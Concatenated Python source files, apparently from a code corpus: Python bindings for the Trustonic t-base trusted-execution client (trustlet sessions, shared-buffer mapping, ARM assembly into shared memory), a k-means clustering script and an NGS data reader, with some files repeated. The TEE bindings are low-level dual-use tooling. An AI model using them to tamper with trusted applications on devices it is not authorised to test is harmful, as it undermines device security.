The timeout parameter specifies the number of milliseconds the call will wait for a notification. If the caller passes 0 as timeout value the call will immediately return. If timeout value is below 0 the call will block until a notification for the session has been received. Warning: If timeout is below 0, the call will block. Caller has to trust the other side to send a notification to wake him up again. Args: timeout (:obj:`int`): Time in milliseconds to wait Raises: :class:`Error`: See below the possible error codes: - ERR_TIMEOUT if no notification arrived in time - INFO_NOTIFICATION if a problem with the session was encountered. Get more details with :func:`Trustlet.error()`. - ERR_NOTIFICATION if a problem with the socket occurred - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid """ res = client.mcWaitNotification(ctypes.byref(self._ses), timeout) if res != const.OK: raise Error(res) @contextmanager def share(self, buf): """ Share an additional buffer with the Trusted Application. Args: buf (:class:`Buffer`): Memory buffer to be shared with the TA Yields: :obj:`dict`: Information about the mapped bulk buffer :: { 'sVirtualAddr': 9437184, 'sVirtualLen': 4096 } This method can be used with a Python "with statement", meaning that it will automatically call :func:`Trustlet.map` on enter and :func:`Trustlet.unmap` on exit. :: with app.share(buf): # do something with the additional buffer """ map = self.map(buf) yield map self.unmap(buf, map) def map(self, buf): """ Map additional bulk buffer between a Client Application (CA) and the Trusted Application (TA) for a session. Memory allocated in user space of the CA can be mapped as additional communication channel (besides TCI) to the Trusted Application. Limitation of the Trusted Application memory structure apply: only 6 chunks can be mapped with a maximum chunk size of 1 MiB each. 
Warning: It is up to the application layer (CA) to inform the Trusted Application about the additional mapped bulk memory. Args: buf (:class:`Buffer`): Memory buffer to be shared with the TA Returns: :obj:`dict`: Information about the mapped bulk buffer :: { 'sVirtualAddr': 9437184, 'sVirtualLen': 4096 } Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_BULK_MAPPING when buf is already uses as bulk buffer or when registering the buffer failed """ info = types.mcBulkMap() res = client.mcMap(ctypes.byref(self._ses), buf._ptr, buf._len, ctypes.byref(info)) if res != const.OK: raise Error(res) return dict(info) def unmap(self, buf, info): """ Remove additional mapped bulk buffer between Client Application (CA) and the Trusted Application (TA) for a session. Warning: The bulk buffer will immediately be unmapped from the session context. The application layer (CA) must inform the TA about unmapping of the additional bulk memory before making this call. Args: buf (:class:`Buffer`): Memory buffer shared with the TA info (:obj:`dict`): Information about the mapped bulk buffer Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_BULK_MAPPING when buf was not registered earlier or when unregistering failed """ info = types.mcBulkMap(info) res = client.mcUnmap(ctypes.byref(self._ses), buf._ptr, ctypes.byref(info)) if res != const.OK: raise Error(res) def error(self): """ Get additional error information of the last error that occurred on a session. After the request the stored error code will be deleted. 
Returns: :obj:`int`: >0 Trusted Application has terminated itself with this value, <0 Trusted Application is dead because of an error within t-base (e.g. Kernel exception) """ err = ctypes.c_int32() res = client.mcGetSessionErrorCode(ctypes.byref(self._ses), ctypes.byref(err)) if res != const.OK: raise Error(res) return err.value class Buffer(io.RawIOBase): """ This class exposes a memory memory buffer as a raw I/O stream object. It use provide convenience functions to read/write common data types. Warning: The constructor of this class should never be called directly. If you need to allocate a new buffer, use :func:`Device.malloc` instead. """ def __init__(self, ptr, len): self._ptr = ptr self._len = len self._pos = 0 def seek(self, offset, whence=0): self._checkClosed() if whence == io.SEEK_SET: self._pos = offset elif whence == io.SEEK_CUR: self._pos += offset elif whence == io.SEEK_END: self._pos = self._len + offset self._pos = max(0, min(self._len, self._pos)) return self._pos def truncate(self, size=None): self._checkClosed() if size is None: size = self._pos self._len = max(0, size) self.seek(self._pos) return self._len def seekable(self): return True def readinto(self, b): self._checkClosed() addr = self._ptr.value + self._pos size = min(self._len, self._pos + len(b)) - self._pos b[:size] = (ctypes.c_char * size).from_address(addr).raw self._pos += size return size def readable(self): return True def write(self, b): self._checkClosed() addr = self._ptr.value + self._pos size = min(self._len, self._pos + len(b)) - self._pos (ctypes.c_char * size).from_address(addr).raw = b[:size] self._pos += size return size def writable(self): return True def skip(self, size): """ Move stream position forward of size bytes. Args: size (:obj:`int`): Number of bytes to skip """ self.seek(size, io.SEEK_CUR) def read_byte(self, signed=False): """ Read the byte at the current position. 
Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<b" if signed else "<B" return struct.unpack(fmt, self.read(1))[0] def read_word(self, signed=False): """ Read the word (2-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<h" if signed else "<H" return struct.unpack(fmt, self.read(2))[0] def read_dword(self, signed=False): """ Read the double word (4-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<i" if signed else "<I" return struct.unpack(fmt, self.read(4))[0] def read_qword(self, signed=False): """ Read the quadro word (8-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<q" if signed else "<Q" return struct.unpack(fmt, self.read(8))[0] def read_float(self): """ Read the float (4-byte long) value at the current position. Returns: :obj:`float`: The value read """ return struct.unpack("<f", self.read(4))[0] def read_double(self): """ Read the double (8-byte long) value at the current position. Returns: :obj:`float`: The value read """ return struct.unpack("<d", self.read(8))[0] def read_string(self): """ Read the NULL-terminated string at the current position. Returns: :obj:`str`: The string read """ val = b"" c = self.read(1) while c != b"\x00": val += c c = self.read(1) return val def write_byte(self, val, signed=False): """ Write a byte at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<b" if signed else "<B" self.write(struct.pack(fmt, val)) def write_word(self, val, signed=False): """ Write a word (2-byte long) at the current position. 
Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<h" if signed else "<H" self.write(struct.pack(fmt, val)) def write_dword(self, val, signed=False): """ Write a double word (4-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<i" if signed else "<I" self.write(struct.pack(fmt, val)) def write_qword(self, val, signed=False): """ Write a quadro word (8-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<q" if signed else "<Q" self.write(struct.pack(fmt, val)) def write_float(self, val): """ Write a float (4-byte long) value at the current position. Args: val (:class:`float`): The value to write """ self.write(struct.pack("<f", val)) def write_double(self, val): """ Write a double (8-byte long) value at the current position. Args: val (:class:`float`): The value to write """ self.write(struct.pack("<d", val)) def write_string(self, val): """ Write a NULL-terminated string at the current position. Args: val (:obj:`str`): The string to write """ self.write(val) self.write(b"\x00") def hexdump(self, size=-1): """ Display an hex dump of the size bytes at the current position. Args: size (:obj:`int`): The number of bytes to dump (-1 = all) """ if size == -1: size = self._len - self._pos for i in range(0, size, 0x10): hex_dmp = "0x{:08x}:".format(i) chr_dmp = " | " for j in range(min(0x10, size - i)): hex_chr = self.read(1)[0] hex_dmp += " {:02x}".format(hex_chr) if 0x20 <= hex_chr <= 0x7E: chr_dmp += chr(hex_chr) else: chr_dmp += "." hex_dmp = hex_dmp.ljust(60, " ") print(hex_dmp + chr_dmp) def assemble(self, code, thumb=True): """ Assemble code using Keystone and write it at the current position. 
Args: code (:obj:`str`): the code to assemble thumb (:obj:`bool`): True if Thumb, False otherwise Returns: :obj:`int`: the number of bytes written """ from keystone import Ks, KS_ARCH_ARM, KS_MODE_ARM, KS_MODE_THUMB ks = Ks(KS_ARCH_ARM, KS_MODE_THUMB if thumb else KS_MODE_ARM) addr = self._ptr.value bs, size = ks.asm(code, addr) self.write(bytes(bytearray(bs))) return len(bs) def disassemble(self, size, thumb=True): """ Display the bytes disassembled using Capstone at the current position. Args: size (:obj:`int`): the number of bytes to disassemble thumb (:obj:`bool`): True if Thumb, False otherwise """ from capstone import Cs, CS_ARCH_ARM, CS_MODE_ARM, CS_MODE_THUMB cs = Cs(CS_ARCH_ARM, CS_MODE_THUMB if thumb else CS_MODE_ARM) addr = self._ptr.value for insn in cs.disasm(self.read(size), addr): insn_info = insn.address, insn.mnemonic, insn.op_str print("{:08x}:\t{} {}".format(insn_info))
bindings/mcclient/mcclient.py
import ctypes import io import os import struct import sys from contextlib import contextmanager from . import mcclient_const as const from . import mcclient_types as types if 'sphinx' in sys.modules: client = None else: client = types.load_library() if client is None: raise ImportError("ERROR: fail to load the dynamic library.") class Error(Exception): """ This exception is raised when a function doesn't return successfully. """ def __init__(self, code): self._code = code @property def code(self): """ The error code returned by the function. """ return self._code def __str__(self): special = ["NO_NOTIFICATION", "INFO_NOTIFICATION"] for name in dir(const): if getattr(const, name) == self._code \ and (name.startswith("ERR_") or name in special): return name return "ERR_UNKNOWN" class Device(object): """ Initialize a session with a t-base device. Args: device_id (:obj:`int`): Identifier for the t-base device to be used. DEVICE_ID_DEFAULT refers to the default device. This class can be used with a Python "with statement", meaning that it will automatically call :func:`Device.open` on enter and :func:`Device.close` on exit. :: with Device() as dev: # do something with the device """ def __init__(self, id=const.DEVICE_ID_DEFAULT): self._id = id @property def id(self): """ The identifier for the t-base device used. """ return self._id def __enter__(self): self.open() return self def __exit__(self, *_): self.close() return False def open(self): """ Open a new connection to a t-base device. It initializes all device specific resources required to communicate with an t-base instance located on the specified device in the system. 
Raises: :class:`Error`: See below the possible error codes: - ERR_INVALID_OPERATION if device already opened - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_UNKNOWN_DEVICE when device_id is unknown - ERR_INVALID_DEVICE_FILE if kernel module under /dev/mobicore cannot be opened """ res = client.mcOpenDevice(self._id) if res != const.OK: raise Error(res) def close(self): """ Close the connection to a t-base device. When closing a device, active sessions have to be closed beforehand. Resources associated with the device will be released. The device may be opened again after it has been closed. Raises: :class:`Error`: See below the possible error codes: - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_SESSION_PENDING when a session is still open - ERR_DAEMON_UNREACHABLE when problems with daemon occur """ res = client.mcCloseDevice(self._id) if res != const.OK: raise Error(res) @contextmanager def buffer(self, len): """ Instantiate a new memory buffer. Args: len (:obj:`int`): Length of the block in bytes Yields: :class:`Buffer`: The allocated block of memory This method can be used with a Python "with statement", meaning that it will automatically call :func:`Device.malloc` on enter and :func:`Device.free` on exit. :: with dev.buffer(0x1000) as tci: # do something with the buffer """ buf = self.malloc(len) yield buf self.free(buf) def malloc(self, len): """ Allocate a block of memory. The driver allocates a contiguous block of memory which can be used as WSM. This implicates that the allocated memory is always aligned to 4K. 
Args: len (:obj:`int`): Length of the block in bytes Returns: :class:`Buffer`: The allocated block of memory Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_NO_FREE_MEMORY if no more contiguous memory is available in this size or for this process """ buf = ctypes.POINTER(ctypes.c_uint8)() res = client.mcMallocWsm(self._id, 0, len, ctypes.byref(buf), 0) if res != const.OK: raise Error(res) ptr = ctypes.cast(buf, ctypes.c_void_p) return Buffer(ptr, len) def free(self, buf): """ Free a block of memory. The driver will free a block of memory previously allocated. Args: buf (:class:`Buffer`): The memory block to be freed Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_FREE_MEMORY_FAILED on failures """ ptr = ctypes.cast(buf._ptr, ctypes.POINTER(ctypes.c_uint8)) res = client.mcFreeWsm(self._id, ptr) if res != const.OK: raise Error(res) buf.close() def version(self): """ Get t-base version information of a device. Returns: :obj:`dict`: t-base version info :: { 'productId': b't-base-EXYNOS64-Android-302A-V015-681_681', 'versionMci': 65536, 'versionSo': 131074, 'versionMclf': 131077, 'versionContainer': 131073, 'versionMcConfig': 2, 'versionTlApi': 65552, 'versionDrApi': 65538, 'versionCmp': 0 } Raises: :class:`Error`: See below the possible error codes: - ERR_UNKNOWN_DEVICE when device is not open - INVALID_PARAMETER if a parameter is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur """ info = types.mcVersionInfo() res = client.mcGetMobiCoreVersion(self._id, ctypes.byref(info)) if res != const.OK: raise Error(res) return dict(info) class Trustlet(object): """ Initialize a session to a Trusted Application. 
Args: dev (:class:`Device`): The t-base device to use tci (:class:`Buffer`): TCI buffer for communicating with the TA buf (:obj:`bytes`): Buffer containing the TA binary This class can be used with a Python "with statement", meaning that it will automatically call :func:`Trustlet.open` on enter and :func:`Trustlet.close` on exit. :: with Trustlet(dev, tci, buf) as app: # do something with the trustlet """ @staticmethod def uuid(dev, tci, uuid): """ Initialize a session to a TA using its UUID. Args: dev (:class:`Device`): The t-base device to use tci (:class:`Buffer`): TCI buffer for communicating with the TA buf (:obj:`str`): The Trusted Application's UUID Returns: :class:`Trustlet`: A Trusted Application session """ path = "/vendor/app/mcRegistry/{}.tlbin".format(uuid) if not os.path.exists(path): path = "/system/app/mcRegistry/{}.tlbin".format(uuid) if not os.path.exists(path): raise IOError("Could not find the trustlet") with open(path, "rb") as fd: return Trustlet(dev, tci, fd.read()) def __init__(self, dev, tci, buf): self._ses = types.mcSessionHandle() self._ses.device_id = dev.id self._tci = tci self._buf = buf @property def id(self): """ The identifier of the Trusted Application session. """ return self._ses.sessionId def __enter__(self): self.open() return self def __exit__(self, *_): self.close() return False def open(self): """ Open a new session to a Trusted Application (Trustlet). The trustlet will be loaded from the memory buffer. Write MCP open message to buffer and notify t-base about the availability of a new command. Waits till t-base responds with the new session ID (stored in the MCP buffer). 
Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if session parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon socket occur - ERR_UNKNOWN_DEVICE when daemon returns an error - ERR_TRUSTED_APPLICATION_NOT_FOUND when TA cannot be loaded """ ta = (ctypes.c_uint8 * len(self._buf)).from_buffer_copy(self._buf) ta_ptr = ctypes.cast(ta, ctypes.POINTER(ctypes.c_uint8)) tci_ptr = ctypes.cast(self._tci._ptr, ctypes.POINTER(ctypes.c_uint8)) res = client.mcOpenTrustlet(ctypes.byref(self._ses), 0, ta_ptr, len(self._buf), tci_ptr, self._tci._len) if res != const.OK: raise Error(res) def close(self): """ Close a Trusted Application session. Closes the specified t-base session. The call will block until the session has been closed. Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if session parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_INVALID_DEVICE_FILE when daemon cannot open trustlet file """ res = client.mcCloseSession(ctypes.byref(self._ses)) if res != const.OK: raise Error(res) def notify(self): """ Notify a session. Notifies the session end point about available message data. Corresponding errors can only be received by :func:`Trustlet.wait_notification`. A session has to be opened in advance. Raises: :class:`Error`: See below the possible error codes: - DRV_INVALID_PARAMETER if session parameter is invalid - DRV_ERR_UNKNOWN_SESSION when session id is invalid - DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid """ res = client.mcNotify(self._ses) if res != const.OK: raise Error(res) def wait_notification(self, timeout=const.INFINITE_TIMEOUT): """ Wait for a notification. Wait for a notification issued by t-base for a specific session. 
The timeout parameter specifies the number of milliseconds the call will wait for a notification. If the caller passes 0 as timeout value the call will immediately return. If timeout value is below 0 the call will block until a notification for the session has been received. Warning: If timeout is below 0, the call will block. Caller has to trust the other side to send a notification to wake him up again. Args: timeout (:obj:`int`): Time in milliseconds to wait Raises: :class:`Error`: See below the possible error codes: - ERR_TIMEOUT if no notification arrived in time - INFO_NOTIFICATION if a problem with the session was encountered. Get more details with :func:`Trustlet.error()`. - ERR_NOTIFICATION if a problem with the socket occurred - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid """ res = client.mcWaitNotification(ctypes.byref(self._ses), timeout) if res != const.OK: raise Error(res) @contextmanager def share(self, buf): """ Share an additional buffer with the Trusted Application. Args: buf (:class:`Buffer`): Memory buffer to be shared with the TA Yields: :obj:`dict`: Information about the mapped bulk buffer :: { 'sVirtualAddr': 9437184, 'sVirtualLen': 4096 } This method can be used with a Python "with statement", meaning that it will automatically call :func:`Trustlet.map` on enter and :func:`Trustlet.unmap` on exit. :: with app.share(buf): # do something with the additional buffer """ map = self.map(buf) yield map self.unmap(buf, map) def map(self, buf): """ Map additional bulk buffer between a Client Application (CA) and the Trusted Application (TA) for a session. Memory allocated in user space of the CA can be mapped as additional communication channel (besides TCI) to the Trusted Application. Limitation of the Trusted Application memory structure apply: only 6 chunks can be mapped with a maximum chunk size of 1 MiB each. 
Warning: It is up to the application layer (CA) to inform the Trusted Application about the additional mapped bulk memory. Args: buf (:class:`Buffer`): Memory buffer to be shared with the TA Returns: :obj:`dict`: Information about the mapped bulk buffer :: { 'sVirtualAddr': 9437184, 'sVirtualLen': 4096 } Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_BULK_MAPPING when buf is already uses as bulk buffer or when registering the buffer failed """ info = types.mcBulkMap() res = client.mcMap(ctypes.byref(self._ses), buf._ptr, buf._len, ctypes.byref(info)) if res != const.OK: raise Error(res) return dict(info) def unmap(self, buf, info): """ Remove additional mapped bulk buffer between Client Application (CA) and the Trusted Application (TA) for a session. Warning: The bulk buffer will immediately be unmapped from the session context. The application layer (CA) must inform the TA about unmapping of the additional bulk memory before making this call. Args: buf (:class:`Buffer`): Memory buffer shared with the TA info (:obj:`dict`): Information about the mapped bulk buffer Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_BULK_MAPPING when buf was not registered earlier or when unregistering failed """ info = types.mcBulkMap(info) res = client.mcUnmap(ctypes.byref(self._ses), buf._ptr, ctypes.byref(info)) if res != const.OK: raise Error(res) def error(self): """ Get additional error information of the last error that occurred on a session. After the request the stored error code will be deleted. 
Returns: :obj:`int`: >0 Trusted Application has terminated itself with this value, <0 Trusted Application is dead because of an error within t-base (e.g. Kernel exception) """ err = ctypes.c_int32() res = client.mcGetSessionErrorCode(ctypes.byref(self._ses), ctypes.byref(err)) if res != const.OK: raise Error(res) return err.value class Buffer(io.RawIOBase): """ This class exposes a memory memory buffer as a raw I/O stream object. It use provide convenience functions to read/write common data types. Warning: The constructor of this class should never be called directly. If you need to allocate a new buffer, use :func:`Device.malloc` instead. """ def __init__(self, ptr, len): self._ptr = ptr self._len = len self._pos = 0 def seek(self, offset, whence=0): self._checkClosed() if whence == io.SEEK_SET: self._pos = offset elif whence == io.SEEK_CUR: self._pos += offset elif whence == io.SEEK_END: self._pos = self._len + offset self._pos = max(0, min(self._len, self._pos)) return self._pos def truncate(self, size=None): self._checkClosed() if size is None: size = self._pos self._len = max(0, size) self.seek(self._pos) return self._len def seekable(self): return True def readinto(self, b): self._checkClosed() addr = self._ptr.value + self._pos size = min(self._len, self._pos + len(b)) - self._pos b[:size] = (ctypes.c_char * size).from_address(addr).raw self._pos += size return size def readable(self): return True def write(self, b): self._checkClosed() addr = self._ptr.value + self._pos size = min(self._len, self._pos + len(b)) - self._pos (ctypes.c_char * size).from_address(addr).raw = b[:size] self._pos += size return size def writable(self): return True def skip(self, size): """ Move stream position forward of size bytes. Args: size (:obj:`int`): Number of bytes to skip """ self.seek(size, io.SEEK_CUR) def read_byte(self, signed=False): """ Read the byte at the current position. 
Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<b" if signed else "<B" return struct.unpack(fmt, self.read(1))[0] def read_word(self, signed=False): """ Read the word (2-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<h" if signed else "<H" return struct.unpack(fmt, self.read(2))[0] def read_dword(self, signed=False): """ Read the double word (4-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<i" if signed else "<I" return struct.unpack(fmt, self.read(4))[0] def read_qword(self, signed=False): """ Read the quadro word (8-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<q" if signed else "<Q" return struct.unpack(fmt, self.read(8))[0] def read_float(self): """ Read the float (4-byte long) value at the current position. Returns: :obj:`float`: The value read """ return struct.unpack("<f", self.read(4))[0] def read_double(self): """ Read the double (8-byte long) value at the current position. Returns: :obj:`float`: The value read """ return struct.unpack("<d", self.read(8))[0] def read_string(self): """ Read the NULL-terminated string at the current position. Returns: :obj:`str`: The string read """ val = b"" c = self.read(1) while c != b"\x00": val += c c = self.read(1) return val def write_byte(self, val, signed=False): """ Write a byte at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<b" if signed else "<B" self.write(struct.pack(fmt, val)) def write_word(self, val, signed=False): """ Write a word (2-byte long) at the current position. 
Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<h" if signed else "<H" self.write(struct.pack(fmt, val)) def write_dword(self, val, signed=False): """ Write a double word (4-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<i" if signed else "<I" self.write(struct.pack(fmt, val)) def write_qword(self, val, signed=False): """ Write a quadro word (8-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<q" if signed else "<Q" self.write(struct.pack(fmt, val)) def write_float(self, val): """ Write a float (4-byte long) value at the current position. Args: val (:class:`float`): The value to write """ self.write(struct.pack("<f", val)) def write_double(self, val): """ Write a double (8-byte long) value at the current position. Args: val (:class:`float`): The value to write """ self.write(struct.pack("<d", val)) def write_string(self, val): """ Write a NULL-terminated string at the current position. Args: val (:obj:`str`): The string to write """ self.write(val) self.write(b"\x00") def hexdump(self, size=-1): """ Display an hex dump of the size bytes at the current position. Args: size (:obj:`int`): The number of bytes to dump (-1 = all) """ if size == -1: size = self._len - self._pos for i in range(0, size, 0x10): hex_dmp = "0x{:08x}:".format(i) chr_dmp = " | " for j in range(min(0x10, size - i)): hex_chr = self.read(1)[0] hex_dmp += " {:02x}".format(hex_chr) if 0x20 <= hex_chr <= 0x7E: chr_dmp += chr(hex_chr) else: chr_dmp += "." hex_dmp = hex_dmp.ljust(60, " ") print(hex_dmp + chr_dmp) def assemble(self, code, thumb=True): """ Assemble code using Keystone and write it at the current position. 
Args: code (:obj:`str`): the code to assemble thumb (:obj:`bool`): True if Thumb, False otherwise Returns: :obj:`int`: the number of bytes written """ from keystone import Ks, KS_ARCH_ARM, KS_MODE_ARM, KS_MODE_THUMB ks = Ks(KS_ARCH_ARM, KS_MODE_THUMB if thumb else KS_MODE_ARM) addr = self._ptr.value bs, size = ks.asm(code, addr) self.write(bytes(bytearray(bs))) return len(bs) def disassemble(self, size, thumb=True): """ Display the bytes disassembled using Capstone at the current position. Args: size (:obj:`int`): the number of bytes to disassemble thumb (:obj:`bool`): True if Thumb, False otherwise """ from capstone import Cs, CS_ARCH_ARM, CS_MODE_ARM, CS_MODE_THUMB cs = Cs(CS_ARCH_ARM, CS_MODE_THUMB if thumb else CS_MODE_ARM) addr = self._ptr.value for insn in cs.disasm(self.read(size), addr): insn_info = insn.address, insn.mnemonic, insn.op_str print("{:08x}:\t{} {}".format(insn_info))
0.617513
0.201892
import logging as log import numpy as np import random log.basicConfig(format="%(message)s", level=log.INFO) def load_data(file_path): """加载数据 源数据格式为多行,每行为两个浮点数,分别表示 (x,y) """ data = [] with open(file_path, 'r', encoding='utf-8') as fr: for line in fr.read().splitlines(): line_float = list(map(float, line.split('\t'))) data.append(line_float) data = np.array(data) return data def score_euclidean(a, b): """计算两个点之间的欧式距离""" s = np.sqrt(np.sum(np.power(a - b, 2))) return s def rand_center(data, k): """随机采样 k 个样本作为聚类中心""" centers = np.array(random.sample(list(data), k)) return centers def k_means(data, k, max_iter=100, score=score_euclidean, e=1e-6): """ K-Means 算法 一般 K-Mean 算法的终止条件有如下几个: 1. 所有样本的类别不再改变 2. 达到最大迭代次数 3. 精度达到要求(?) 返回聚类中心及聚类结果 """ # 样本数 n = len(data) # 保存结果 # 每个结果为一个二元组 [label, score] 分别保存每个样本所在的簇及距离质心的距离 ret = np.array([[-1, np.inf]] * n) # 选取聚类中心 centers = rand_center(data, k) changed = True # 标记样本类别是否改变 n_iter = 0 # 记录迭代次数 while changed and n_iter < max_iter: changed = False n_iter += 1 for i in range(n): # 对每个数据 i_score = np.inf i_label = -1 for j in range(k): # 与每个质心比较 s_ij = score(data[i], centers[j]) if s_ij < i_score: i_score = s_ij i_label = j if ret[i, 0] != i_label: # 样本的类别发生了改变 changed = True ret[i, :] = i_label, i_score # 更新聚类中心 log.info(centers) for i in range(k): data_i = data[ret[:, 0] == i] # 标签为 i 的样本 centers[i, :] = np.mean(data_i, axis=0) # 按类别过滤样本 log.info(n_iter) # 迭代次数 return centers, ret def _test(): """""" file_path = r"./data.txt" data = load_data(file_path) print(data) print(np.shape(data)[1]) s = score_euclidean(data[0], data[1]) print(s) centers = rand_center(data, 3) print(centers) if __name__ == '__main__': """""" # _test() file_path = "./data.txt" data = load_data(file_path) centers, ret = k_means(data, 3) # print(ret)
_codes/machine_learning/KMeans/kmeans.py
import logging as log import numpy as np import random log.basicConfig(format="%(message)s", level=log.INFO) def load_data(file_path): """加载数据 源数据格式为多行,每行为两个浮点数,分别表示 (x,y) """ data = [] with open(file_path, 'r', encoding='utf-8') as fr: for line in fr.read().splitlines(): line_float = list(map(float, line.split('\t'))) data.append(line_float) data = np.array(data) return data def score_euclidean(a, b): """计算两个点之间的欧式距离""" s = np.sqrt(np.sum(np.power(a - b, 2))) return s def rand_center(data, k): """随机采样 k 个样本作为聚类中心""" centers = np.array(random.sample(list(data), k)) return centers def k_means(data, k, max_iter=100, score=score_euclidean, e=1e-6): """ K-Means 算法 一般 K-Mean 算法的终止条件有如下几个: 1. 所有样本的类别不再改变 2. 达到最大迭代次数 3. 精度达到要求(?) 返回聚类中心及聚类结果 """ # 样本数 n = len(data) # 保存结果 # 每个结果为一个二元组 [label, score] 分别保存每个样本所在的簇及距离质心的距离 ret = np.array([[-1, np.inf]] * n) # 选取聚类中心 centers = rand_center(data, k) changed = True # 标记样本类别是否改变 n_iter = 0 # 记录迭代次数 while changed and n_iter < max_iter: changed = False n_iter += 1 for i in range(n): # 对每个数据 i_score = np.inf i_label = -1 for j in range(k): # 与每个质心比较 s_ij = score(data[i], centers[j]) if s_ij < i_score: i_score = s_ij i_label = j if ret[i, 0] != i_label: # 样本的类别发生了改变 changed = True ret[i, :] = i_label, i_score # 更新聚类中心 log.info(centers) for i in range(k): data_i = data[ret[:, 0] == i] # 标签为 i 的样本 centers[i, :] = np.mean(data_i, axis=0) # 按类别过滤样本 log.info(n_iter) # 迭代次数 return centers, ret def _test(): """""" file_path = r"./data.txt" data = load_data(file_path) print(data) print(np.shape(data)[1]) s = score_euclidean(data[0], data[1]) print(s) centers = rand_center(data, 3) print(centers) if __name__ == '__main__': """""" # _test() file_path = "./data.txt" data = load_data(file_path) centers, ret = k_means(data, 3) # print(ret)
0.242564
0.370738
import os from typing import Optional, Sequence, Dict, List from csr.exceptions import ReaderException from sources2csr.ngs import AnalysisType, NGS, LibraryStrategy class NgsReader: """Reader that reads NGS data files. """ def __init__(self, input_dir: str, library_strategy: LibraryStrategy): self.input_dir = input_dir self.library_strategy = library_strategy @staticmethod def determine_analysis_type(filename: str) -> Optional[AnalysisType]: """Determine whole genome or whole exome sequencing analysis type based on the filename. If _WGS or _WXS are not in the filename returns None. :param filename: name of the input file :return: Type of sequencing event """ if '_WGS' in filename.upper(): return AnalysisType.WGS elif '_WXS' in filename.upper(): return AnalysisType.WXS else: return None @staticmethod def biosource_biomaterial_from_sample_id(sample_id: str, filename: str, by='_') -> tuple: """ Splits sample _id into biosource_id and biomaterial_id. Every sample ID should be structured as <BiosourceID>_<BiomaterialID>, e.g. PMCBS000AAA_PMCBM000AAA. :param sample_id: cBioPortal sample ID :param filename: ull path with a name of the input file :param by: Character to use for splitting, default: '_' :return: biosource_id and biomaterial_id values tuple or NgsReaderException """ biosource_biomaterial_pair = sample_id.split(by) if len(biosource_biomaterial_pair) != 2: raise ReaderException('Invalid sample_id format found in {} NGS file. 
sample_id: {}' .format(filename, sample_id)) else: return biosource_biomaterial_pair[0], biosource_biomaterial_pair[1] @staticmethod def list_files(input_dir: str) -> List[str]: """ Get list of file names inside a directory :param input_dir: directory with input files :return: List of file paths with names """ for file in os.listdir(input_dir): if os.path.isfile(os.path.join(input_dir, file)): yield file def map_ngs(self, biosources_biomaterials_dict: Dict[str, Sequence[str]], filename: str) -> Optional[Sequence[NGS]]: """ Maps biosource to biomaterials dictionary to the NGS Sequence :param biosources_biomaterials_dict: biosource to biomaterials dictionary :param filename: name of the input file :return: """ ngs_data = [] analysis_type = self.determine_analysis_type(filename) for biosource, biomaterials in biosources_biomaterials_dict.items(): for biomaterial in biomaterials: ngs_data.append(NGS(biosource_id=biosource, biomaterial_id=biomaterial, analysis_type=analysis_type, library_strategy=self.library_strategy)) return ngs_data def read_data(self, filename: str) -> Optional[Sequence[NGS]]: pass
sources2csr/ngs_reader.py
